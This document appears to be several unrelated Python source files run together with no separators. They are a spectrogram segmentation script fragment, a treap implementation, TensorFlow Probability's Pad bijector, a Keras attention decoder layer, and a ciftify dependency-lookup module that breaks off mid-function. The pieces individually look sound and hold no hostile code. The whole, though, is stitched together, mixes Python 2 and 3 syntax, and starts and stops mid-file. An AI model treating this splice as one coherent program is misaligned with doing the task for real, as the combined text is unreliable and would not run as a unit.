plt.imshow(mypic_rev_log,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gaussian Filtering (log)') # plt.subplot(6,2,5) # plt.imshow(mypic_rev_gauss_grad,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gradient') # plt.subplot(6,2,6) # plt.imshow(mypic_rev_log_gauss_grad,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gradient (log)') # plt.subplot(6,2,7) # plt.imshow(mypic_rev_gauss_grad_bin,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ >90%') # plt.subplot(6,2,8) # plt.imshow(mypic_rev_log_gauss_grad_bin,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ >90% (log)') # plt.subplot(6,2,9) # plt.imshow(mypic_rev_gauss_grad_bin_close,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ binary_closing + binary_opening') # plt.subplot(6,2,10) # plt.imshow(mypic_rev_log_gauss_grad_bin_close,cmap=plt.cm.gray) # plt.axis('off') # plt.title('+ binary_closing + binary_opening (log)') #SEGMENTS labeled_segments, num_seg = sp.ndimage.label(bfh_rm) # plt.subplot(6,2,11) # plt.imshow(labeled_segments) # plt.axis('off') # plt.title('+ binary_fill_holes + remove_small_objects') for current_segment_id in range(1,num_seg+1): current_segment = (labeled_segments == current_segment_id)*1 xr = current_segment.max(axis = 0) yr = current_segment.max(axis = 1) xr_max = np.max(xr*np.arange(len(xr))) xr[xr==0] = xr.shape[0] xr_min = np.argmin(xr) yr_max = np.max(yr*np.arange(len(yr))) yr[yr==0] = yr.shape[0] yr_min = np.argmin(yr) segment_frame = [yr_min, yr_max, xr_min, xr_max] subpic = mypic_rev_gauss[yr_min:yr_max+1,xr_min:xr_max+1] SPEC_SEGMENTS.append([file_idx, current_segment_id, segment_frame, subpic]) # LOG SEGMENTS labeled_segments, num_seg = sp.ndimage.label(log_bfh_rm) # plt.subplot(6,2,12) # plt.imshow(labeled_segments) # plt.axis('off') # plt.title('+ binary_fill_holes + remove_small_objects (log)') for current_segment_id in range(1,num_seg+1): current_segment = (labeled_segments == current_segment_id)*1 xr = current_segment.max(axis = 0) yr = current_segment.max(axis = 1) xr_max = np.max(xr*np.arange(len(xr))) xr[xr==0] = xr.shape[0] xr_min = np.argmin(xr) yr_max = np.max(yr*np.arange(len(yr))) yr[yr==0] = yr.shape[0] yr_min = np.argmin(yr) segment_frame = [yr_min, yr_max, xr_min, xr_max] subpic = mypic_rev_log_gauss[yr_min:yr_max+1,xr_min:xr_max+1] LOG_SPEC_SEGMENTS.append([file_idx, current_segment_id, segment_frame, subpic]) #fig.savefig(single_spectro_folder+str(bird_spec)+'_'+fname+'_patterns.png',dpi = 300) #fig.clear() #plt.show() print strftime("%a, %d %b %Y %H:%M:%S +0000", localtime()) ## CHECK THE SEGMENTS: #N = 10 #fig = plt.figure(figsize=(20, 10)) #for i in range(N): # for j in range(N): # plt.subplot(N,N,i*N+j) # plt.imshow( SPEC_SEGMENTS[i*N+j][3]) # # #N = 10 #fig = plt.figure(figsize=(20, 10)) #for i in range(N): # for j in range(N): # plt.subplot(N,N,i*N+j) # plt.imshow( LOG_SPEC_SEGMENTS[-(i*N+j)][3],cmap=plt.cm.afmhot_r) # #a = [] #for r in SPEC_SEGMENTS: # a.append(r[2][1] - r[2][0] ) # #plt.hist(a) output = open(dp_folder + 'SPEC_SEGMENTS.pkl', 'wb') pickle.dump(SPEC_SEGMENTS, output) output.close() output = open(dp_folder + 'LOG_SPEC_SEGMENTS.pkl', 'wb') pickle.dump(LOG_SPEC_SEGMENTS, output) output.close()
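###########################
# Usage sketch: reload the dumped segments
###########################
# Appended for illustration: reading the segment lists back, e.g. in a later
# feature-extraction step. Each entry has the form
#   [file_idx, segment_id, [y_min, y_max, x_min, x_max], subpic]
# where subpic is the cropped, Gaussian-filtered spectrogram patch.
reload_check = open(dp_folder + 'SPEC_SEGMENTS.pkl', 'rb')
reloaded_segments = pickle.load(reload_check)
reload_check.close()
assert len(reloaded_segments) == len(SPEC_SEGMENTS)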
from __future__ import print_function
import random
import sys


class _Node(object):
    def __init__(self, val):
        self.val = val
        self.p = self.l = self.r = None
        self.size = 1
        self.priority = random.random()

    def fix_size_to_top(self):
        self.size = 1
        for c in [self.l, self.r]:
            if c is not None:
                self.size += c.size
        if self.p is not None:
            self.p.fix_size_to_top()

    def assert_valid(self, lt):
        if self.l is None:
            l_size = 0
        else:
            assert self.l.p is self
            assert not lt(self.val, self.l.val)
            assert self.l.priority >= self.priority
            l_size = self.l.assert_valid(lt)
        if self.r is None:
            r_size = 0
        else:
            assert self.r.p is self
            assert not lt(self.r.val, self.val)
            assert self.r.priority >= self.priority
            r_size = self.r.assert_valid(lt)
        assert l_size + 1 + r_size == self.size
        return self.size

    def print_(self, indent):
        if self.p is not None and self.p.l is self:
            print(' ' * indent, 'l', self.val)
        elif self.p is not None and self.p.r is self:
            print(' ' * indent, 'r', self.val)
        else:
            print(' ' * indent, 't', self.val)
        if self.l is not None:
            self.l.print_(indent + 1)
        if self.r is not None:
            self.r.print_(indent + 1)

    def rotate_left(self):
        p, b, q = self, self.r.l, self.r
        assert p is not None and q is not None
        parent = p.p
        if parent is not None:
            is_l = parent.l is p
        p.make_right_child(b)
        q.make_left_child(p)
        if parent is not None:
            if is_l:
                parent.make_left_child(q)
            else:
                parent.make_right_child(q)
        else:
            q.p = None

    def rotate_right(self):
        p, b, q = self.l, self.l.r, self
        assert p is not None and q is not None
        parent = q.p
        if parent is not None:
            is_l = parent.l is q
        q.make_left_child(b)
        p.make_right_child(q)
        if parent is not None:
            if is_l:
                parent.make_left_child(p)
            else:
                parent.make_right_child(p)
        else:
            p.p = None

    def make_left_child(self, other):
        self.l = other
        self._make_child(other)

    def make_right_child(self, other):
        self.r = other
        self._make_child(other)

    def _make_child(self, other):
        if other is not None:
            other.p = self
        self.size = 1
        for c in [self.l, self.r]:
            if c is not None:
                self.size += c.size


class Treap(object):
    def __init__(self, lt):
        self._root = None
        self._lt = lt

    def insert(self, v):
        n = _Node(v)
        if self._root is None:
            self._root = n
            return n
        ins = self._root
        while True:
            if self._lt(v, ins.val):
                if ins.l is None:
                    ins.make_left_child(n)
                    n.fix_size_to_top()
                    self._ins_fix(n)
                    return n
                ins = ins.l
            else:
                if ins.r is None:
                    ins.make_right_child(n)
                    n.fix_size_to_top()
                    self._ins_fix(n)
                    return n
                ins = ins.r

    def erase(self, n):
        if n.l is None and n.r is None:
            if n.p is None:
                assert self._root is n
                self._root = None
                return
            if n.p.l is n:
                n.p.l = None
            else:
                n.p.r = None
            n.p.fix_size_to_top()
            return
        if n.l is None:
            if n.p is None:
                assert self._root is n
                self._root, n.r.p = n.r, None
                return
            if n.p.l is n:
                n.p.l = n.r
            else:
                n.p.r = n.r
            n.r.p = n.p
            n.p.fix_size_to_top()
            return
        if n.r is None:
            if n.p is None:
                assert self._root is n
                self._root, n.l.p = n.l, None
                return
            if n.p.l is n:
                n.p.l = n.l
            else:
                n.p.r = n.l
            n.l.p = n.p
            n.p.fix_size_to_top()
            return
        if n.l.priority < n.r.priority:
            if n is self._root:
                self._root = n.l
            n.rotate_right()
        else:
            if n is self._root:
                self._root = n.r
            n.rotate_left()
        self.erase(n)

    def kth(self, k):
        node = self._root
        while True:
            assert node is not None
            assert node.size > k
            l = 0 if node.l is None else node.l.size
            if l == k:
                return node.val
            elif l > k:
                node = node.l
            else:
                node, k = node.r, k - l - 1

    def size(self):
        return 0 if self._root is None else self._root.size

    def assert_valid(self):
        if self._root is not None:
            assert self._root.p is None
            self._root.assert_valid(self._lt)

    def _ins_fix(self, n):
        p = n.p
        if p is None or p.priority <= n.priority:
            return
        if p.l is n:
            p.rotate_right()
        else:
            p.rotate_left()
        if p is self._root:
            self._root = n
        else:
            self._ins_fix(n)
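# Usage sketch (appended for illustration; the module itself ships no demo):
# build a treap with a plain "<" comparator, query order statistics with
# kth(), and erase a node handle returned by insert(). assert_valid()
# re-checks the BST/heap/size invariants after each mutation.
if __name__ == '__main__':
    import operator

    t = Treap(operator.lt)
    handles = [t.insert(v) for v in [5, 1, 4, 2, 3]]
    t.assert_valid()
    assert t.size() == 5
    assert [t.kth(k) for k in range(t.size())] == [1, 2, 3, 4, 5]
    t.erase(handles[0])        # remove the node holding 5
    t.assert_valid()
    assert t.size() == 4 and t.kth(3) == 4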
# Copyright 2019 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Pad bijector.""" import numpy as np import tensorflow.compat.v2 as tf from tensorflow_probability.python.bijectors import bijector from tensorflow_probability.python.internal import assert_util from tensorflow_probability.python.internal import parameter_properties from tensorflow_probability.python.internal import prefer_static as ps from tensorflow_probability.python.internal import tensor_util from tensorflow_probability.python.internal import tensorshape_util __all__ = [ 'Pad', ] class Pad(bijector.AutoCompositeTensorBijector): """Pads a value to the `event_shape` of a `Tensor`. The semantics of `tfp.bijectors.Pad` generally follow that of `tf.pad()` except that `tfp.bijectors.Pad`'s `paddings` argument applies to the rightmost dimensions. Additionally, the new argument `axis` enables overriding the dimensions to which `paddings` is applied. Like `paddings`, the `axis` argument is also relative to the rightmost dimension and must therefore be negative. The argument `paddings` is a vector of `int` pairs each representing the number of left and/or right `constant_values` to pad to the corresponding righmost dimensions. That is, unless `axis` is specified, specifiying `k` different `paddings` means the rightmost `k` dimensions will be "grown" by the sum of the respective `paddings` row. When `axis` is specified, it indicates the dimension to which the corresponding `paddings` element is applied. By default `axis` is `None` which means it is logically equivalent to `range(start=-len(paddings), limit=0)`, i.e., the rightmost dimensions. Example usage: ```python b = tfp.bijectors.Pad() # Default arguments. b.forward([3., 4.]) # shape: [2] # ==> [[3., 4., 0.]] # shape: [3] b.forward([[1., 2.], [3., 4.]]) # shape: [2, 2] # ==> [[1., 2., 0.], # [3., 4., 0.]] # shape: [2, 3] b.inverse([3., 4., 0.]) # shape: [3] # ==> [3., 4.] # shape: [2] b.forward_log_det_jacobian(any_value) # ==> 0. b.inverse_log_det_jacobian(any_value) # ==> 0. ``` ```python b = tfp.bijectors.Pad(axis=-2) # With non-default `axis` arg. b.forward([[3., 4.]]) # shape: [1, 2] # ==> [[3., 4.], # shape: [2, 2] # [0., 0.]] b.inverse([[3., 4.], # shape: [2, 2] [0., 0.]]) # ==> [[3., 4.]] # shape: [1, 2] b.forward_log_det_jacobian(any_value) # ==> 0. b.inverse_log_det_jacobian(any_value) # ==> 0. ``` """ def __init__(self, paddings=((0, 1),), mode='CONSTANT', constant_values=0, axis=None, validate_args=False, name=None): """Initializes the `Pad` bijector. Args: paddings: A vector-shaped `Tensor` of `int` pairs representing the number of elements to pad on the left and right, respectively. Default value: `((0, 1),)`. mode: One of `'CONSTANT'`, `'REFLECT'`, or `'SYMMETRIC'` (case-insensitive). For more details, see `tf.pad`. constant_values: In "CONSTANT" mode, the scalar pad value to use. Must be same type as `tensor`. For more details, see `tf.pad`. 
axis: The dimensions for which `paddings` are applied. Must be 1:1 with `paddings` or `None`. Default value: `None` (i.e., `tf.range(start=-len(paddings), limit=0)`). validate_args: Python `bool` indicating whether arguments should be checked for correctness. Default value: `False`. name: Python `str`, name given to ops managed by this object. Default value: `None` (i.e., `'pad'`). """ parameters = dict(locals()) with tf.name_scope(name or 'pad') as name: paddings = tensor_util.convert_nonref_to_tensor( paddings, dtype_hint=tf.int32, name='paddings', as_shape_tensor=True) if axis is None: axis = ps.range( start=-ps.size0(paddings), limit=0, dtype=tf.int32, name='axis') else: axis = tensor_util.convert_nonref_to_tensor( axis, dtype_hint=tf.int32, name='axis', as_shape_tensor=True) axis_ = tf.get_static_value(axis) if axis_ is None: raise NotImplementedError( 'Argument `axis` must be known statically. If you need this ' 'feature, please contact `tfprobability@tensorflow.org`.') self._axis = axis self._paddings = paddings self._mode = mode self._constant_values = tensor_util.convert_nonref_to_tensor( constant_values, dtype_hint=tf.float32, name='constant_values') min_event_ndims_ = int(-np.min(np.pad( np.reshape(axis_, newshape=[-1]), mode='constant', pad_width=[[0, 1]]))) super(Pad, self).__init__( forward_min_event_ndims=min_event_ndims_, inverse_min_event_ndims=min_event_ndims_, is_constant_jacobian=True, validate_args=validate_args, parameters=parameters, name=name) @classmethod def _parameter_properties(cls, dtype): return dict( paddings=parameter_properties.ShapeParameterProperties(), constant_values=parameter_properties.ParameterProperties(), axis=parameter_properties.ShapeParameterProperties()) @property def paddings(self): return self._paddings @property def mode(self): return self._mode @property def constant_values(self): return self._constant_values @property def axis(self): return self._axis def _forward(self, x): ndims = ps.rank(x) indices = ps.reshape(ps.add(self.axis, ndims), shape=[-1, 1]) return tf.pad( x, paddings=ps.tensor_scatter_nd_update( ps.zeros([ndims, 2], dtype=tf.int32), indices, self.paddings), mode=self.mode, constant_values=ps.cast(self.constant_values, dtype=x.dtype)) def _inverse(self, y): ndims = ps.rank(y) indices = ps.reshape(ps.add(self.axis, ndims), shape=[-1, 1]) num_left, num_right = ps.unstack(self.paddings, num=2, axis=-1) x = tf.slice( y, begin=ps.tensor_scatter_nd_update( ps.zeros(ndims, dtype=tf.int32), indices, num_left), size=ps.tensor_scatter_nd_sub( ps.shape(y), indices, num_left + num_right)) if not self.validate_args: return x assertions = [ assert_util.assert_equal( self._forward(x), y, message=('Argument `y` to `inverse` was not padded with ' '`constant_values`.')), ] with tf.control_dependencies(assertions): return tf.identity(x) def _inverse_log_det_jacobian(self, y): # We specifically don't validate `y` here because sometimes folks pass dummy # values when `is_constant_jacobian`. 
return tf.zeros([], dtype=y.dtype) def _forward_log_det_jacobian(self, x): return tf.zeros([], dtype=x.dtype) def _forward_event_shape(self, input_shape, is_inverse=False): axis = tf.get_static_value(self.axis) paddings = tf.get_static_value(self.paddings) if input_shape.ndims is None or axis is None or paddings is None: return None output_shape = [tf.compat.dimension_value(d) for d in list(input_shape)] for a, p in zip(list(axis.reshape(-1)), list(paddings.sum(axis=-1))): if output_shape[a] is not None: output_shape[a] += -p if is_inverse else p return output_shape def _forward_event_shape_tensor(self, input_shape, is_inverse=False): ndims = ps.size(input_shape) indices = ps.reshape(ps.add(self.axis, ndims), shape=[-1, 1]) extra_sizes = ps.reduce_sum(self.paddings, axis=-1) update_fn = (ps.tensor_scatter_nd_sub if is_inverse else ps.tensor_scatter_nd_add) return update_fn(ps.identity(input_shape), indices, extra_sizes) def _inverse_event_shape(self, output_shape): input_shape = self._forward_event_shape(output_shape, is_inverse=True) if input_shape is not None and any(s < 0 for s in input_shape): raise ValueError('Invalid inverse shape; {}'.format(input_shape)) return input_shape def _inverse_event_shape_tensor(self, output_shape): input_shape = self._forward_event_shape_tensor( output_shape, is_inverse=True) if not self.validate_args: return input_shape assertions = [ assert_util.assert_greater( input_shape, -1, message='Invalid inverse shape; found negative size.') ] with tf.control_dependencies(assertions): return tf.identity(input_shape) def _parameter_control_dependencies(self, is_init): assertions = [] axis = None paddings = None if is_init != tensor_util.is_ref(self.axis): # First we check the shape of the axis argument. msg = 'Argument `axis` must be scalar or vector.' if tensorshape_util.rank(self.axis.shape) is not None: if tensorshape_util.rank(self.axis.shape) > 1: raise ValueError(msg) elif self.validate_args: if axis is None: axis = tf.convert_to_tensor(self.axis) assertions.append(assert_util.assert_rank_at_most( axis, 1, message=msg)) # Next we check the values of the axis argument. axis_ = tf.get_static_value(self.axis) msg = 'Argument `axis` must be negative.' if axis_ is not None: if np.any(axis_ > -1): raise ValueError(msg) elif self.validate_args: if axis is None: axis = tf.convert_to_tensor(self.axis) assertions.append(assert_util.assert_less(axis, 0, message=msg)) msg = 'Argument `axis` elements must be unique.' if axis_ is not None: if len(np.array(axis_).reshape(-1)) != len(np.unique(axis_)): raise ValueError(msg) elif self.validate_args: if axis is None: axis = tf.convert_to_tensor(self.axis) assertions.append(assert_util.assert_equal( ps.size0(axis), ps.size0(ps.setdiff1d(axis)), message=msg)) if is_init != tensor_util.is_ref(self.paddings): # First we check the shape of the paddings argument. msg = 'Argument `paddings` must be a vector of pairs.' if tensorshape_util.is_fully_defined(self.paddings.shape): shape = np.int32(self.paddings.shape) if len(shape) != 2 or shape[0] < 1 or shape[1] != 2: raise ValueError(msg) elif self.validate_args: if paddings is None: paddings = tf.convert_to_tensor(self.paddings) with tf.control_dependencies([ assert_util.assert_equal(tf.rank(paddings), 2, message=msg)]): shape = tf.shape(paddings) assertions.extend([ assert_util.assert_greater(shape[0], 0, message=msg), assert_util.assert_equal(shape[1], 2, message=msg), ]) # Next we check the values of the paddings argument. 
paddings_ = tf.get_static_value(self.paddings) msg = 'Argument `paddings` must be non-negative.' if paddings_ is not None: if np.any(paddings_ < 0): raise ValueError(msg) elif self.validate_args: if paddings is None: paddings = tf.convert_to_tensor(self.paddings) assertions.append(assert_util.assert_greater( paddings, -1, message=msg)) if is_init != (tensor_util.is_ref(self.axis) and tensor_util.is_ref(self.paddings)): axis_ = tf.get_static_value(self.axis) if axis_ is None and axis is None: axis = tf.convert_to_tensor(self.axis) len_axis = ps.size0(ps.reshape( axis if axis_ is None else axis_, shape=-1)) paddings_ = tf.get_static_value(self.paddings) if paddings_ is None and paddings is None: paddings = tf.convert_to_tensor(self.paddings) len_paddings = ps.size0( paddings if paddings_ is None else paddings_) msg = ('Arguments `axis` and `paddings` must have the same number ' 'of elements.') if (ps.is_numpy(len_axis) and ps.is_numpy(len_paddings)): if len_axis != len_paddings: raise ValueError(msg + ' Saw: {}, {}.'.format( self.axis, self.paddings)) elif self.validate_args: assertions.append(assert_util.assert_equal( len_axis, len_paddings, message=msg)) return assertions
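# A minimal usage sketch of the Pad bijector defined above. It assumes an
# installed `tensorflow_probability` where this class is exposed as
# `tfp.bijectors.Pad`; the expected values follow the class docstring rather
# than a verified run.
import tensorflow as tf
import tensorflow_probability as tfp

pad_bijector = tfp.bijectors.Pad(paddings=[(0, 2)], constant_values=-1.)
x = tf.constant([3., 4.])
y = pad_bijector.forward(x)                  # expected: [3., 4., -1., -1.]
x_back = pad_bijector.inverse(y)             # expected: [3., 4.]
print(pad_bijector.forward_event_shape([2])) # expected: [4]
# The Jacobian is constant, so the log-det terms are identically zero.
print(pad_bijector.forward_log_det_jacobian(x, event_ndims=1))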
import tensorflow as tf from keras import backend as K from keras import regularizers, constraints, initializers, activations from keras.layers.recurrent import Recurrent, _time_distributed_dense from keras.engine import InputSpec def tfPrint(d, T): return tf.Print(input_=T, data=[T, tf.shape(T)], message=d) class AttentionDecoder(Recurrent): def __init__(self, units, output_dim, activation='tanh', return_probabilities=False, name='AttentionDecoder', kernel_initializer='glorot_uniform', recurrent_initializer='orthogonal', bias_initializer='zeros', kernel_regularizer=None, bias_regularizer=None, activity_regularizer=None, kernel_constraint=None, bias_constraint=None, **kwargs): """ Implements an AttentionDecoder that takes in a sequence encoded by an encoder and outputs the decoded states :param units: dimension of the hidden state and the attention matrices :param output_dim: the number of labels in the output space references: Bahdanau, Dzmitry, Kyunghyun Cho, and Yoshua Bengio. "Neural machine translation by jointly learning to align and translate." arXiv preprint arXiv:1409.0473 (2014). """ self.units = units self.output_dim = output_dim self.return_probabilities = return_probabilities self.activation = activations.get(activation) self.kernel_initializer = initializers.get(kernel_initializer) self.recurrent_initializer = initializers.get(recurrent_initializer) self.bias_initializer = initializers.get(bias_initializer) self.kernel_regularizer = regularizers.get(kernel_regularizer) self.recurrent_regularizer = regularizers.get(kernel_regularizer) self.bias_regularizer = regularizers.get(bias_regularizer) self.activity_regularizer = regularizers.get(activity_regularizer) self.kernel_constraint = constraints.get(kernel_constraint) self.recurrent_constraint = constraints.get(kernel_constraint) self.bias_constraint = constraints.get(bias_constraint) super(AttentionDecoder, self).__init__(**kwargs) self.name = name self.return_sequences = True # must return sequences def build(self, input_shape): """ See Appendix 2 of Bahdanau 2014, arXiv:1409.0473 for model details that correspond to the matrices here. 
""" self.batch_size, self.timesteps, self.input_dim = input_shape if self.stateful: super(AttentionDecoder, self).reset_states() self.states = [None, None] # y, s """ Matrices for creating the context vector """ self.V_a = self.add_weight(shape=(self.units,), name='V_a', initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) self.W_a = self.add_weight(shape=(self.units, self.units), name='W_a', initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) self.U_a = self.add_weight(shape=(self.input_dim, self.units), name='U_a', initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) self.b_a = self.add_weight(shape=(self.units,), name='b_a', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for the r (reset) gate """ self.C_r = self.add_weight(shape=(self.input_dim, self.units), name='C_r', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_r = self.add_weight(shape=(self.units, self.units), name='U_r', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_r = self.add_weight(shape=(self.output_dim, self.units), name='W_r', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_r = self.add_weight(shape=(self.units, ), name='b_r', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for the z (update) gate """ self.C_z = self.add_weight(shape=(self.input_dim, self.units), name='C_z', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_z = self.add_weight(shape=(self.units, self.units), name='U_z', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_z = self.add_weight(shape=(self.output_dim, self.units), name='W_z', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_z = self.add_weight(shape=(self.units, ), name='b_z', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for the proposal """ self.C_p = self.add_weight(shape=(self.input_dim, self.units), name='C_p', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_p = self.add_weight(shape=(self.units, self.units), name='U_p', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_p = self.add_weight(shape=(self.output_dim, self.units), name='W_p', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_p = self.add_weight(shape=(self.units, ), name='b_p', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for making the final prediction vector """ self.C_o = self.add_weight(shape=(self.input_dim, self.output_dim), name='C_o', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_o = self.add_weight(shape=(self.units, 
self.output_dim), name='U_o', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_o = self.add_weight(shape=(self.output_dim, self.output_dim), name='W_o', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_o = self.add_weight(shape=(self.output_dim, ), name='b_o', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) # For creating the initial state: self.W_s = self.add_weight(shape=(self.input_dim, self.units), name='W_s', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.input_spec = [ InputSpec(shape=(self.batch_size, self.timesteps, self.input_dim))] self.built = True def call(self, x): # store the whole sequence so we can "attend" to it at each timestep self.x_seq = x # apply the a dense layer over the time dimension of the sequence # do it here because it doesn't depend on any previous steps # thefore we can save computation time: self._uxpb = _time_distributed_dense(self.x_seq, self.U_a, b=self.b_a, input_dim=self.input_dim, timesteps=self.timesteps, output_dim=self.units) return super(AttentionDecoder, self).call(x) def get_initial_state(self, inputs): # apply the matrix on the first time step to get the initial s0. s0 = activations.tanh(K.dot(inputs[:, 0], self.W_s)) # from keras.layers.recurrent to initialize a vector of (batchsize, # output_dim) y0 = K.zeros_like(inputs) # (samples, timesteps, input_dims) y0 = K.sum(y0, axis=(1, 2)) # (samples, ) y0 = K.expand_dims(y0) # (samples, 1) y0 = K.tile(y0, [1, self.output_dim]) return [y0, s0] def step(self, x, states): ytm, stm = states # repeat the hidden state to the length of the sequence _stm = K.repeat(stm, self.timesteps) # now multiplty the weight matrix with the repeated hidden state _Wxstm = K.dot(_stm, self.W_a) # calculate the attention probabilities # this relates how much other timesteps contributed to this one. et = K.dot(activations.tanh(_Wxstm + self._uxpb), K.expand_dims(self.V_a)) at = K.exp(et) at_sum = K.sum(at, axis=1) at_sum_repeated = K.repeat(at_sum, self.timesteps) at /= at_sum_repeated # vector of size (batchsize, timesteps, 1) # calculate the context vector context = K.squeeze(K.batch_dot(at, self.x_seq, axes=1), axis=1) # ~~~> calculate new hidden state # first calculate the "r" gate: rt = activations.sigmoid( K.dot(ytm, self.W_r) + K.dot(stm, self.U_r) + K.dot(context, self.C_r) + self.b_r) # now calculate the "z" gate zt = activations.sigmoid( K.dot(ytm, self.W_z) + K.dot(stm, self.U_z) + K.dot(context, self.C_z) + self.b_z) # calculate the proposal hidden state: s_tp = activations.tanh( K.dot(ytm, self.W_p) + K.dot((rt * stm), self.U_p) + K.dot(context, self.C_p) + self.b_p) # new hidden state: st = (1 - zt) * stm + zt * s_tp yt = activations.softmax( K.dot(ytm, self.W_o) + K.dot(stm, self.U_o) + K.dot(context, self.C_o) + self.b_o) if self.return_probabilities: return at, [yt, st] else: return yt, [yt, st] def compute_output_shape(self, input_shape): """ For Keras internal compatability checking """ if self.return_probabilities: return (None, self.timesteps, self.timesteps) else: return (None, self.timesteps, self.output_dim) def get_config(self): """ For rebuilding models on load time. 
""" config = { 'output_dim': self.output_dim, 'units': self.units, 'return_probabilities': self.return_probabilities } base_config = super(AttentionDecoder, self).get_config() return dict(list(base_config.items()) + list(config.items()))
#!/usr/bin/env python3 """ These functions search the environment for software dependencies and configuration. """ import os import sys import subprocess import logging import pkg_resources import re import glob import ciftify.utils as util def find_workbench(): """ Returns path of the workbench bin/ folder, or None if unavailable. """ try: workbench = util.check_output('which wb_command') workbench = workbench.strip() except: workbench = None return workbench def find_fsl(): """ Returns the path of the fsl bin/ folder, or None if unavailable. """ # Check the FSLDIR environment variable first shell_val = os.getenv('FSLDIR') dir_fsl = os.path.abspath(shell_val) if shell_val else '' if os.path.exists(dir_fsl): return dir_fsl # If the env var method fails, fall back to using which. This method is # not used first because sometimes the executable is installed separately # from the rest of the fsl package, making it hard (or impossible) to locate # fsl data files based on the returned path try: dir_fsl = util.check_output('which fsl') dir_fsl = '/'.join(dir_fsl.split('/')[:-2]) except: dir_fsl = None return dir_fsl def find_freesurfer(): """ Returns the path of the freesurfer bin/ folder, or None if unavailable. """ try: dir_freesurfer = util.check_output('which recon-all') dir_freesurfer = '/'.join(dir_freesurfer.split('/')[:-1]) except: dir_freesurfer = None return dir_freesurfer def find_msm(): try: msm = util.check_output("which msm") msm = msm.replace(os.linesep, '') except: msm = None return msm def msm_version(): ''' Returns version info for msm ''' msm_path = find_msm() if not msm_path: return "MSM not found." try: version = util.check_output('msm --version').replace(os.linesep, '') except: version = '' info = "MSM:{0}Path: {1}{0}Version: {2}".format('{} '.format(os.linesep), msm_path, version) return info def verify_msm_available(): logger = logging.getLogger(__name__) msm = find_msm() if not msm: logger.error("Cannot find \'msm\' binary. Please download and install MSM from " "https://github.com/ecr05/MSM_HOCR_macOSX, or run with the \"--surf_reg FS\" option") sys.exit(1) def find_scene_templates(): """ Returns the hcp scene templates path. If the shell variable HCP_SCENE_TEMPLATES is set, uses that. Otherwise returns the defaults stored in the ciftify/data/scene_templates folder. """ dir_hcp_templates = os.getenv('HCP_SCENE_TEMPLATES') if dir_hcp_templates is None: ciftify_path = os.path.dirname(__file__) dir_hcp_templates = os.path.abspath(os.path.join(find_ciftify_global(), 'scene_templates')) return dir_hcp_templates def find_ciftify_global(): """ Returns the path to ciftify required config and support files. If the shell variable CIFTIFY_DATA is set, uses that. Otherwise returns the defaults stored in the ciftify/data folder. 
""" logger = logging.getLogger(__name__) dir_templates = os.getenv('CIFTIFY_DATA') if dir_templates is None: ciftify_path = os.path.dirname(__file__) dir_templates = os.path.abspath(os.path.join(ciftify_path, 'data')) else: if not os.path.exists(dir_templates): logger.error("CIFTIFY_DATA enviroment variable is not pointing at a directory that exists") sys.exit(1) return dir_templates def find_HCP_S900_GroupAvg(): """return path to HCP_S900_GroupAvg which should be in ciftify""" s900 = os.path.join(find_ciftify_global(), 'HCP_S900_GroupAvg_v1') return s900 def find_HCP_S1200_GroupAvg(): """return path to HCP_S900_GroupAvg which should be in ciftify""" s1200 = os.path.join(find_ciftify_global(), 'HCP_S1200_GroupAvg_v1') return s1200 def find_freesurfer_data(): """ Returns the freesurfer data path defined in the environment. """ try: dir_freesurfer_data = os.getenv('SUBJECTS_DIR') except: dir_freesurfer_data = None return dir_freesurfer_data def find_work_dir(): """ Returns the ciftify working directory path defined in the environment. """ logger = logging.getLogger(__name__) work_dir = os.getenv('CIFTIFY_WORKDIR') if work_dir is None: work_dir = os.getenv('HCP_DATA') if work_dir is not None: logger.working("Environment variable HCP_DATA has been deprecated. \ Please instead use CIFTIFY_WORKDIR in the future.") else: work_dir = None return work_dir def wb_command_version(): ''' Returns version info about wb_command. Will raise an error if wb_command is not found, since the scripts that use this depend heavily on wb_command and should crash anyway in such an unexpected situation. ''' wb_path = find_workbench() if wb_path is 